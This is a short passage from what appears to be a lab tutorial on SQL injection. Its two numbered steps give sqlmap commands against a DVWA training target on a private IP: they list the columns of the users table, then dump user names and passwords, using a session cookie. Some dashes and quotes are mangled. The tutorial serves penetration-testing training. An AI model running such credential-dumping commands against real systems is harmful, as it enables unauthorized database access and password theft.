  • 17. List columns on target table of selected database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users --columns
  • 18. List user and password from target columns of target table of selected database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users –C user,user_id,password --dump